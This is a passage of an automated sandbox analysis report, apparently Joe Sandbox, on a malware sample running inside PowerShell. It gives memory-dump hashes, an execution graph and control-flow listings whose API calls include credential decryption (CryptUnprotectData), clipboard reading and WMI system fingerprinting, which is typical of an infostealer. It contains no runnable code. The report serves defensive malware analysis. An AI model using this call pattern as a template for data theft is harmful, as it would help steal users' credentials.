                                                                                        • Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$h2uh$x.sh$-sh
                                                                                        • API String ID: 0-442816374
                                                                                        • Opcode ID: 3735ce7ed501e3cbaa3eadf12ae10f41a414e469d5dfdb53958889475cf354e2
                                                                                        • Instruction ID: 2cb27f1dc700330843bab00de67a147f1db769f40efc87200fbd719209c100f2
                                                                                        • Opcode Fuzzy Hash: 3735ce7ed501e3cbaa3eadf12ae10f41a414e469d5dfdb53958889475cf354e2
                                                                                        • Instruction Fuzzy Hash: D52272B0E002189FDB54DB54C954BADBBB6EF84304F5184A9DA096F346CB31AEC5CFA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-651010669
                                                                                        • Opcode ID: 1106df0dc4849ebad4944f7ea8afd8a8495f12616fbfa94b3a417a6559326d8f
                                                                                        • Instruction ID: fc49faeb49c354af3bf103172a93774598724a9bd0925beef792ad068e693761
                                                                                        • Opcode Fuzzy Hash: 1106df0dc4849ebad4944f7ea8afd8a8495f12616fbfa94b3a417a6559326d8f
                                                                                        • Instruction Fuzzy Hash: 8D51A1F1A1028ADFCF2A8F19E9096E67BA2BF42331F448467E8054B191DB35DD84EB51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-651010669
                                                                                        • Opcode ID: 34198e2cbe3aac87c6fa244b4aa84686461fcf061e346ef5724b77a4ca680621
                                                                                        • Instruction ID: 2826b76d65cee3d74fda2e3fa0c5a8242568cf940cf0827a6324628fae62c70c
                                                                                        • Opcode Fuzzy Hash: 34198e2cbe3aac87c6fa244b4aa84686461fcf061e346ef5724b77a4ca680621
                                                                                        • Instruction Fuzzy Hash: 94419AF0A1420ADFCF24CE1AE5457EA77B2FF42311F94846BE8198B290D735D984CB51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-651010669
                                                                                        • Opcode ID: 2e72a8293caae8882e0fd6a258940583dc3d9fa062102da28f669c96c59c51cc
                                                                                        • Instruction ID: afe295c31bb3e8edfc02af0fe2e65a999057b5d4e7120e6b0b2a0816b369c9ec
                                                                                        • Opcode Fuzzy Hash: 2e72a8293caae8882e0fd6a258940583dc3d9fa062102da28f669c96c59c51cc
                                                                                        • Instruction Fuzzy Hash: 1D3182F1A00206DFDF248F25F541BFA7BA6BB89614F948CABE4059B250D731D980CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-651010669
                                                                                        • Opcode ID: ab2a3159706288bb4daf5e39732220aac34df47a3e56e48d616d74628f10c4b3
                                                                                        • Instruction ID: 82c71bb600d8cb91fccdbe7bd097c90866f59cd76656c1cb99eb26068d6e8ec1
                                                                                        • Opcode Fuzzy Hash: ab2a3159706288bb4daf5e39732220aac34df47a3e56e48d616d74628f10c4b3
                                                                                        • Instruction Fuzzy Hash: 9131ABF1A1430ACFCF208E55E5406EA77B5FB42210F28846BD805DB2A1F772CD64CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (ojq$(ojq$tPjq$$jq
                                                                                        • API String ID: 0-3857383769
                                                                                        • Opcode ID: 6d6ac120e5400d8c97d834e9d4a68afac63db81e37e11e929366d918a9c9dbeb
                                                                                        • Instruction ID: 3d8bc0d1c67ac156eb071475c3b31221ff09ca13a07952b6198119c61d4d240c
                                                                                        • Opcode Fuzzy Hash: 6d6ac120e5400d8c97d834e9d4a68afac63db81e37e11e929366d918a9c9dbeb
                                                                                        • Instruction Fuzzy Hash: 2B411BB1A002559FCB258F58E940BE6BBF5FF85310F5884ABD9049F282CB71DD85C7A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-2428501249
                                                                                        • Opcode ID: 81af71dd95b01f59480527a9e6421c10e85dc924e7ecd736f0d693ea8f164080
                                                                                        • Instruction ID: aa0af2896a7724c44ea255ca161eab575aaf96840595eb964503412bf70f130b
                                                                                        • Opcode Fuzzy Hash: 81af71dd95b01f59480527a9e6421c10e85dc924e7ecd736f0d693ea8f164080
                                                                                        • Instruction Fuzzy Hash: BA2123B13142065FEB24952AA9007B7A7DAFBC1711F64882BA849DF3C1DD75D841C7A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$$jq$$jq
                                                                                        • API String ID: 0-1496060811
                                                                                        • Opcode ID: 0c57728e131d7ed81b63293c3b9c0266dbe4cc68cdc022ae33cc3f4c412577ce
                                                                                        • Instruction ID: d759b7f00d982a17b2e9e17cf6ab8798c8804df0c0233091cd66488ffaaf5b35
                                                                                        • Opcode Fuzzy Hash: 0c57728e131d7ed81b63293c3b9c0266dbe4cc68cdc022ae33cc3f4c412577ce
                                                                                        • Instruction Fuzzy Hash: 8D01BC5130A39A4FC327062929200A67FB7AFC351032940DBC889DF3D7CA248D09C3A7

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.5%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:36.1%
                                                                                        Total number of Nodes:302
                                                                                        Total number of Limit Nodes:18
                                                                                        execution_graph 13042 4fe6cf CoInitializeSecurity 13242 52b5b2 13243 52b5e0 13242->13243 13244 52b63e 13243->13244 13249 52b460 LdrInitializeThunk 13243->13249 13248 52b460 LdrInitializeThunk 13244->13248 13247 52b9c1 13248->13247 13249->13244 13250 4fd92e 13254 4f95d0 13250->13254 13252 4fd935 CoUninitialize 13253 4fd960 13252->13253 13255 4f95e4 13254->13255 13255->13252 13047 529ad0 13048 529af0 13047->13048 13050 529b2e 13048->13050 13057 52b460 LdrInitializeThunk 13048->13057 13049 529c91 13050->13049 13058 529a70 13050->13058 13053 529aa0 RtlFreeHeap 13053->13049 13054 529b8a 13055 52b460 LdrInitializeThunk 13054->13055 13056 529bde 13054->13056 13055->13056 13056->13053 13057->13050 13061 52cd50 13058->13061 13060 529a7a RtlAllocateHeap 13062 52cd70 13061->13062 13062->13060 13062->13062 13116 51aa73 13117 51aa7e 13116->13117 13121 526240 13117->13121 13119 51aa8c 13120 526240 LdrInitializeThunk 13119->13120 13120->13119 13122 52624e 13121->13122 13125 52632b 13122->13125 13130 52b460 LdrInitializeThunk 13122->13130 13124 5263ad 13124->13119 13125->13124 13127 526436 13125->13127 13129 52b460 LdrInitializeThunk 13125->13129 13127->13124 13131 52b460 LdrInitializeThunk 13127->13131 13129->13125 13130->13122 13131->13127 13200 508592 13201 5085e0 13200->13201 13202 508633 13201->13202 13204 5086f6 13201->13204 13205 50890a 13201->13205 13207 508718 13201->13207 13209 50b7e0 13202->13209 13203 50b7e0 LdrInitializeThunk 13203->13204 13205->13203 13207->13204 13207->13205 13207->13207 13208 52e780 LdrInitializeThunk 13207->13208 13208->13207 13210 50b8a0 13209->13210 13211 50b837 13209->13211 13210->13204 13211->13210 13222 503fb0 13211->13222 13223 503fd0 13222->13223 13228 52e5f0 13223->13228 13225 504125 13226 52e5f0 LdrInitializeThunk 13225->13226 13227 50437c 13226->13227 13230 52e610 13228->13230 13229 52e72e 13229->13225 13230->13229 13232 52b460 LdrInitializeThunk 13230->13232 13232->13229 13233 51ba95 13234 51ba9f 13233->13234 13234->13234 13235 51bb7a GetPhysicallyInstalledSystemMemory 13234->13235 13236 51bbb0 13235->13236 13063 4fe54a CoInitializeEx CoInitializeEx 13064 5208d7 13067 503fa0 13064->13067 13066 5208dc CoSetProxyBlanket 13067->13066 13068 508bd5 13070 508be0 13068->13070 13069 508d7f CryptUnprotectData 13071 508da9 13069->13071 13070->13069 13132 5243f5 13133 5243fa 13132->13133 13134 524412 GetUserDefaultUILanguage 13133->13134 13135 52443e 13134->13135 13136 4fe767 13141 501a70 13136->13141 13138 4fe76d 13139 501a70 6 API calls 13138->13139 13140 4fe77f 13139->13140 13151 501a84 13141->13151 13142 501c2a 13142->13138 13143 502442 RtlExpandEnvironmentStrings 13143->13151 13144 5026fc RtlExpandEnvironmentStrings 13144->13151 13145 502562 RtlExpandEnvironmentStrings 13145->13151 13146 52b460 LdrInitializeThunk 13146->13151 13147 50297a RtlExpandEnvironmentStrings 13147->13151 13150 529aa0 RtlFreeHeap 13150->13151 13151->13142 13151->13143 13151->13144 13151->13145 13151->13146 13151->13147 13151->13150 13152 52e440 13151->13152 13156 52eb40 13151->13156 13154 52e460 13152->13154 13153 52e58e 13153->13151 13154->13153 13162 52b460 LdrInitializeThunk 13154->13162 13157 52eb60 13156->13157 13160 52ebae 13157->13160 13163 52b460 LdrInitializeThunk 13157->13163 13158 52ec4e 13158->13151 13160->13158 13164 52b460 LdrInitializeThunk 13160->13164 13162->13153 13163->13160 13164->13158 13165 52baf8 13167 52ba2c 13165->13167 13166 52baae 13167->13166 13169 52b460 LdrInitializeThunk 13167->13169 13169->13166 13170 52c079 GetForegroundWindow GetForegroundWindow 13072 51bf5f 13074 51bf90 13072->13074 13073 51c06e 13074->13073 13076 52b460 LdrInitializeThunk 13074->13076 13076->13073 13171 51e37f SysFreeString 13172 51e4bc 13171->13172 13256 4fd721 13257 4fd730 13256->13257 13261 4fd76e 13257->13261 13319 52b460 LdrInitializeThunk 13257->13319 13258 4fd7de 13274 5123b0 13258->13274 13261->13258 13320 52b460 LdrInitializeThunk 13261->13320 13263 4fd815 13286 512b80 13263->13286 13265 4fd831 13294 512ed0 13265->13294 13267 4fd84d 13300 515560 13267->13300 13271 4fd87b 13321 521740 13271->13321 13275 512410 13274->13275 13275->13275 13276 51242c RtlExpandEnvironmentStrings 13275->13276 13278 512470 13276->13278 13277 51250c 13277->13263 13278->13277 13279 5124e9 RtlExpandEnvironmentStrings 13278->13279 13281 51252a 13278->13281 13283 512621 13278->13283 13279->13277 13279->13281 13279->13283 13280 512791 GetLogicalDrives 13284 52e780 LdrInitializeThunk 13280->13284 13281->13281 13282 52e780 LdrInitializeThunk 13281->13282 13282->13283 13283->13280 13283->13283 13285 5127a7 13284->13285 13285->13285 13287 512c20 13286->13287 13287->13287 13288 512c83 RtlExpandEnvironmentStrings 13287->13288 13289 512cd0 13288->13289 13290 512d51 13289->13290 13291 512d7f 13289->13291 13292 512d40 RtlExpandEnvironmentStrings 13289->13292 13293 512d66 RtlExpandEnvironmentStrings 13290->13293 13291->13265 13292->13290 13293->13291 13295 512ede 13294->13295 13333 52d6f0 13295->13333 13298 512e99 13298->13267 13299 512f87 13299->13298 13337 52dae0 13299->13337 13301 515580 13300->13301 13303 5155ee 13301->13303 13354 52b460 LdrInitializeThunk 13301->13354 13302 4fd872 13310 5159f0 13302->13310 13303->13302 13304 529a70 RtlAllocateHeap 13303->13304 13307 515678 13304->13307 13306 529aa0 RtlFreeHeap 13306->13302 13309 5156fe 13307->13309 13355 52b460 LdrInitializeThunk 13307->13355 13309->13306 13356 515a10 13310->13356 13312 515a04 13312->13271 13315 516210 13315->13271 13316 52e5f0 LdrInitializeThunk 13318 5161e6 13316->13318 13318->13315 13318->13316 13318->13318 13371 52e910 13318->13371 13319->13261 13320->13258 13322 52174e 13321->13322 13323 521758 OpenClipboard 13322->13323 13324 521775 GetClipboardData 13323->13324 13325 4fd8c5 13323->13325 13326 5218f0 CloseClipboard 13324->13326 13327 521790 GlobalLock 13324->13327 13326->13325 13328 5217b0 13327->13328 13330 5217b5 13327->13330 13328->13326 13329 5218df GlobalUnlock 13329->13326 13331 5217fe GetWindowLongW 13330->13331 13332 5217d0 13330->13332 13331->13332 13332->13329 13334 52d710 13333->13334 13335 52d7df 13334->13335 13347 52b460 LdrInitializeThunk 13334->13347 13335->13299 13338 52db00 13337->13338 13339 52db4e 13338->13339 13348 52b460 LdrInitializeThunk 13338->13348 13341 529a70 RtlAllocateHeap 13339->13341 13344 52dddc 13339->13344 13343 52dbc9 13341->13343 13346 52dc3e 13343->13346 13349 52b460 LdrInitializeThunk 13343->13349 13344->13299 13350 529aa0 13346->13350 13347->13335 13348->13339 13349->13346 13351 529ab3 13350->13351 13352 529ab5 13350->13352 13351->13344 13353 529aba RtlFreeHeap 13352->13353 13353->13344 13354->13303 13355->13309 13357 515a50 13356->13357 13357->13357 13375 529ad0 13357->13375 13364 5277d0 13367 527800 13364->13367 13365 52d6f0 LdrInitializeThunk 13365->13367 13366 52dae0 3 API calls 13366->13367 13367->13365 13367->13366 13368 52798c 13367->13368 13397 52e110 13367->13397 13407 52b460 LdrInitializeThunk 13367->13407 13368->13318 13373 52e930 13371->13373 13372 52e988 13372->13318 13373->13372 13410 52b460 LdrInitializeThunk 13373->13410 13376 529af0 13375->13376 13378 529b2e 13376->13378 13393 52b460 LdrInitializeThunk 13376->13393 13377 515aa3 13385 529cc0 13377->13385 13378->13377 13379 529a70 RtlAllocateHeap 13378->13379 13382 529b8a 13379->13382 13381 529aa0 RtlFreeHeap 13381->13377 13384 529bde 13382->13384 13394 52b460 LdrInitializeThunk 13382->13394 13384->13381 13386 515aaf 13385->13386 13387 529cd1 13385->13387 13389 529de0 13386->13389 13387->13386 13395 52b460 LdrInitializeThunk 13387->13395 13390 529dea 13389->13390 13391 5159f9 13389->13391 13390->13391 13396 52b460 LdrInitializeThunk 13390->13396 13391->13312 13391->13364 13393->13378 13394->13384 13395->13386 13396->13391 13398 52e11f 13397->13398 13400 52e25e 13398->13400 13408 52b460 LdrInitializeThunk 13398->13408 13399 52e427 13399->13367 13400->13399 13402 529a70 RtlAllocateHeap 13400->13402 13403 52e2c6 13402->13403 13405 52e36e 13403->13405 13409 52b460 LdrInitializeThunk 13403->13409 13404 529aa0 RtlFreeHeap 13404->13399 13405->13404 13407->13367 13408->13400 13409->13405 13410->13372 13077 4f8640 13079 4f864f 13077->13079 13078 4f8927 ExitProcess 13079->13078 13080 4f8664 GetCurrentProcessId GetCurrentThreadId 13079->13080 13081 4f8910 13079->13081 13082 4f868f 13080->13082 13083 4f8696 SHGetSpecialFolderPathW 13080->13083 13084 4f8919 13081->13084 13082->13083 13085 4f8730 13083->13085 13096 52b3e0 13084->13096 13085->13085 13087 529a70 RtlAllocateHeap 13085->13087 13088 4f8796 GetForegroundWindow 13087->13088 13090 4f8811 13088->13090 13090->13081 13091 4f890b 13090->13091 13093 4fb5e0 FreeLibrary 13091->13093 13094 4fb5fc 13093->13094 13095 4fb601 FreeLibrary 13094->13095 13095->13081 13099 52cd30 13096->13099 13098 52b3e5 FreeLibrary 13098->13078 13100 52cd39 13099->13100 13100->13098 13101 50fe40 13102 50fea0 13101->13102 13103 50fe4e 13101->13103 13107 50ff60 13103->13107 13108 50ff70 13107->13108 13111 52e780 13108->13111 13110 51004f 13112 52e7a0 13111->13112 13113 52e8be 13112->13113 13115 52b460 LdrInitializeThunk 13112->13115 13113->13110 13115->13113 13237 51ef01 13238 51ef47 SysAllocString 13237->13238 13240 51f198 13238->13240 13241 51d68d CoSetProxyBlanket 13411 5004ac 13412 5004c6 13411->13412 13413 5006f0 RtlExpandEnvironmentStrings 13412->13413 13415 4feaaa 13412->13415 13416 50076a 13413->13416 13416->13415 13417 504f80 13416->13417 13418 504fa0 13417->13418 13418->13418 13419 52e5f0 LdrInitializeThunk 13418->13419 13423 5050ed 13419->13423 13420 5052b6 13422 50514c 13420->13422 13433 52b460 LdrInitializeThunk 13420->13433 13421 52e910 LdrInitializeThunk 13421->13423 13422->13415 13423->13420 13423->13421 13423->13422 13426 52e5f0 LdrInitializeThunk 13423->13426 13427 52e9e0 13423->13427 13426->13423 13428 52ea00 13427->13428 13430 52ea4e 13428->13430 13434 52b460 LdrInitializeThunk 13428->13434 13429 52eaee 13429->13423 13430->13429 13435 52b460 LdrInitializeThunk 13430->13435 13433->13422 13434->13430 13435->13429 13173 4fd071 13174 4fd090 13173->13174 13178 5265e0 13174->13178 13176 5265e0 12 API calls 13177 4fd198 13176->13177 13177->13176 13179 526610 CoCreateInstance 13178->13179 13181 526d60 13179->13181 13182 52682a SysAllocString 13179->13182 13184 526d70 GetVolumeInformationW 13181->13184 13186 5268de 13182->13186 13185 526d8e 13184->13185 13185->13177 13187 5268e6 CoSetProxyBlanket 13186->13187 13188 526d4c SysFreeString 13186->13188 13189 526d42 13187->13189 13190 526906 SysAllocString 13187->13190 13188->13181 13189->13188 13192 5269c0 13190->13192 13192->13192 13193 5269d6 SysAllocString 13192->13193 13196 5269f9 13193->13196 13194 526d2c SysFreeString SysFreeString 13194->13189 13195 526d22 SysFreeString 13195->13194 13196->13194 13196->13195 13197 526a3d VariantInit 13196->13197 13199 526aa0 13197->13199 13198 526d11 VariantClear 13198->13195 13199->13198

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 5265e0-526602 1 526610-526622 0->1 1->1 2 526624-526636 1->2 3 526640-5266a4 2->3 3->3 4 5266a6-5266e4 3->4 5 5266f0-526702 4->5 5->5 6 526704-526723 5->6 8 526725-52673a 6->8 9 52678d-526796 6->9 10 526740-52677a 8->10 11 5267a0-5267c2 9->11 10->10 12 52677c-526789 10->12 11->11 13 5267c4-526824 CoCreateInstance 11->13 12->9 14 526d60-526d8c call 52d140 GetVolumeInformationW 13->14 15 52682a-52685b 13->15 20 526d96-526d98 14->20 21 526d8e-526d92 14->21 16 526860-5268b1 15->16 16->16 18 5268b3-5268e0 SysAllocString 16->18 26 5268e6-526900 CoSetProxyBlanket 18->26 27 526d4c-526d5c SysFreeString 18->27 23 526dad-526db4 20->23 21->20 24 526db6-526dbd 23->24 25 526dcd-526de3 23->25 24->25 28 526dbf-526dcb 24->28 29 526df0-526e04 25->29 30 526d42-526d48 26->30 31 526906-52691b 26->31 27->14 28->25 29->29 32 526e06-526e47 29->32 30->27 33 526920-526944 31->33 34 526e50-526e98 32->34 33->33 35 526946-5269ba SysAllocString 33->35 34->34 36 526e9a-526ed2 call 50d080 34->36 37 5269c0-5269d4 35->37 41 526ee0-526ee8 36->41 37->37 39 5269d6-5269fb SysAllocString 37->39 44 526a01-526a23 39->44 45 526d2c-526d3e SysFreeString * 2 39->45 41->41 43 526eea-526eec 41->43 46 526ef2-526f02 call 4f8040 43->46 47 526da0-526da7 43->47 51 526d22-526d29 SysFreeString 44->51 52 526a29-526a2c 44->52 45->30 46->47 47->23 49 526f07-526f0e 47->49 51->45 52->51 54 526a32-526a37 52->54 54->51 55 526a3d-526a91 VariantInit 54->55 56 526aa0-526ae6 55->56 56->56 57 526ae8-526b07 56->57 59 526d11-526d1e VariantClear 57->59 60 526b0d-526b13 57->60 59->51 60->59 61 526b19-526b23 60->61 62 526b25-526b2c 61->62 63 526b5d-526b5f 61->63 65 526b3c-526b40 62->65 64 526b61-526b77 call 4f7fb0 63->64 74 526cc0-526cd1 64->74 75 526b7d-526b89 64->75 67 526b42-526b4b 65->67 68 526b30 65->68 71 526b52-526b56 67->71 72 526b4d-526b50 67->72 70 526b31-526b3a 68->70 70->64 70->65 71->70 73 526b58-526b5b 71->73 72->70 73->70 77 526cd3 74->77 78 526cd8-526ce7 74->78 75->74 76 526b8f-526b97 75->76 79 526ba0-526baa 76->79 77->78 80 526ce9 78->80 81 526cee-526d0e call 4f7fe0 call 4f7fc0 78->81 82 526bc0-526bc6 79->82 83 526bac-526bb1 79->83 80->81 81->59 86 526bc8-526bcb 82->86 87 526be9-526bf7 82->87 85 526c50-526c64 83->85 89 526c66-526c6c 85->89 86->87 90 526bcd-526be7 86->90 91 526c78-526c81 87->91 92 526bf9-526bfc 87->92 89->74 95 526c6e-526c70 89->95 90->85 96 526c83-526c85 91->96 97 526c87-526c8a 91->97 92->91 98 526bfe-526c49 92->98 95->79 99 526c76 95->99 96->89 100 526cbc-526cbe 97->100 101 526c8c-526cba 97->101 98->85 99->74 100->85 101->85
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(0053068C,00000000,00000001,0053067C,00000000), ref: 00526819
                                                                                        • SysAllocString.OLEAUT32(83CD81D2), ref: 005268B8
                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 005268F8
                                                                                        • SysAllocString.OLEAUT32(83CD81D2), ref: 00526947
                                                                                        • SysAllocString.OLEAUT32(83CD81D2), ref: 005269D7
                                                                                        • VariantInit.OLEAUT32(09:;), ref: 00526A42
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00526D50
                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,798B7F53,00000000,00000000,00000000,00000000), ref: 00526D88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                        • String ID: $09:;$C
                                                                                        • API String ID: 505850577-3421538064
                                                                                        • Opcode ID: c3144c1515703f343faea833604abd621322c737a1a41d0a0c3cf3b10fc88f60
                                                                                        • Instruction ID: 65a60f1870a4c894baa233cf2502e09bc3005cfa8d2c710418d69d62f182c6e0
                                                                                        • Opcode Fuzzy Hash: c3144c1515703f343faea833604abd621322c737a1a41d0a0c3cf3b10fc88f60
                                                                                        • Instruction Fuzzy Hash: FE32FE726083508FD714CF29D8817ABBBE6EFD6314F18892CE594DB391D674D80ACB92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D$`$
                                                                                        • API String ID: 0-4294123104
                                                                                        • Opcode ID: 44b6b0f53c61e784838eef305ea97bab82deb42f9ba4229a99cdafc0253c4dc2
                                                                                        • Instruction ID: 0ad4dfa1c6f02e30427d471bf8c392f92c715f20eab7e92557f4812d4a1937ae
                                                                                        • Opcode Fuzzy Hash: 44b6b0f53c61e784838eef305ea97bab82deb42f9ba4229a99cdafc0253c4dc2
                                                                                        • Instruction Fuzzy Hash: 60231271D083948FDB14CB38C8497ADBFF1AF46320F0986ADD8999B3D2D6358A45CB52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 596 5004ac-5004c4 597 5004c6-5004c9 596->597 598 5004e2-500510 call 4f1890 597->598 599 5004cb-5004e0 597->599 602 500512-500515 598->602 599->597 603 500517-50052c 602->603 604 50052e-500551 call 4f1890 602->604 603->602 607 500553-500587 call 503b70 604->607 608 500555-500558 604->608 615 500589 607->615 616 50058b-5005cc call 4f7fb0 call 4fa610 607->616 610 501051 608->610 611 501a59 610->611 614 501a5b-501a5e call 4f1f50 611->614 622 4feabd-4feae5 call 4f1f60 614->622 623 4feab6-501a6f 614->623 615->616 629 5005ce-5005d1 616->629 632 4feae7-4feaea 622->632 630 500601-50061a call 4f1890 629->630 631 5005d3-5005ff 629->631 638 500684-5006c1 call 503b70 630->638 639 50061c-500655 call 503b70 630->639 631->629 634 4feaec-4feb07 632->634 635 4feb09-4feb2e call 4f1e50 632->635 634->632 644 4feb32 635->644 645 4feb30-4feb5a 635->645 651 5006c3 638->651 652 5006c5-500768 call 4f7fb0 call 4fa610 RtlExpandEnvironmentStrings 638->652 649 500657 639->649 650 500659-50067f call 4f7fb0 call 4fa610 639->650 644->614 654 4feb5c-4feb5f 645->654 649->650 650->638 651->652 665 50076a-50076d 652->665 657 4febb2-4fec0e call 4f1990 654->657 658 4feb61-4febb0 654->658 657->611 666 4fec14 657->666 658->654 667 5007dc-5007f1 665->667 668 50076f-5007da 665->668 666->611 669 5007f3-500806 call 4f7fc0 667->669 670 50080b-500824 667->670 668->665 669->610 672 500826 670->672 673 500828-50088a call 4f7fb0 670->673 672->673 680 5008b5-5008de call 4f7fc0 673->680 681 50088c-5008b0 call 4f7fc0 * 2 673->681 688 5008e0-5008e3 680->688 699 50104f 681->699 690 500905-500929 call 4f1890 688->690 691 5008e5-500903 688->691 697 500985-50099d 690->697 698 50092b-500955 call 503b70 690->698 691->688 701 50099f-5009a2 697->701 706 500957 698->706 707 500959-500982 call 4f7fb0 call 4fa610 698->707 699->610 702 5009a4-5009d4 701->702 703 5009d6-500a1c call 4f1ba0 701->703 702->701 710 500a1e-500a21 703->710 706->707 707->697 712 500a23-500a65 710->712 713 500a67-500a94 call 4f1aa0 710->713 712->710 718 500a96 713->718 719 500a9b-500afe call 4f1f50 713->719 720 500f0f-500f9b call 4f8af0 call 504f80 718->720 725 500b00 719->725 726 500b02-500b1d call 4f7fb0 719->726 730 500fa0-500fb3 call 4f95d0 720->730 725->726 731 500b4a-500b4c 726->731 732 500b1f-500b2a 726->732 740 500fb5-500fc4 730->740 741 500fed-501019 call 4f7fc0 * 2 730->741 735 500b4e-500b50 731->735 734 500b2c-500b38 call 503ca0 732->734 748 500b3a-500b48 734->748 738 500b52-500b56 735->738 739 500b5b-500b9f call 4f1f60 735->739 738->720 754 500ba1-500ba4 739->754 745 500fc6 740->745 746 500fdc-500feb call 4f7fc0 740->746 768 501023-501030 741->768 769 50101b-50101e call 4f7fc0 741->769 751 500fc8-500fd8 call 503e20 745->751 746->741 748->731 760 500fda 751->760 758 500ba6-500c00 754->758 759 500c18-500c53 call 4f1890 754->759 763 500c02 758->763 764 500c04-500c16 758->764 767 500c55-500c58 759->767 760->746 763->764 764->754 770 500c83-500cd3 call 4f1890 767->770 771 500c5a-500c81 767->771 773 501032-50103e call 4f7fc0 768->773 774 501043-50104a call 4f8bd0 768->774 769->768 781 500cd7-500cda 770->781 771->767 773->774 774->699 782 500ce0-500d6c 781->782 783 500d71-500dc1 call 4f1ba0 781->783 782->781 786 500dc3-500dc6 783->786 787 500e51-500f0a call 4f1ba0 call 503cc0 786->787 788 500dcc-500e4c 786->788 787->735 788->786
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
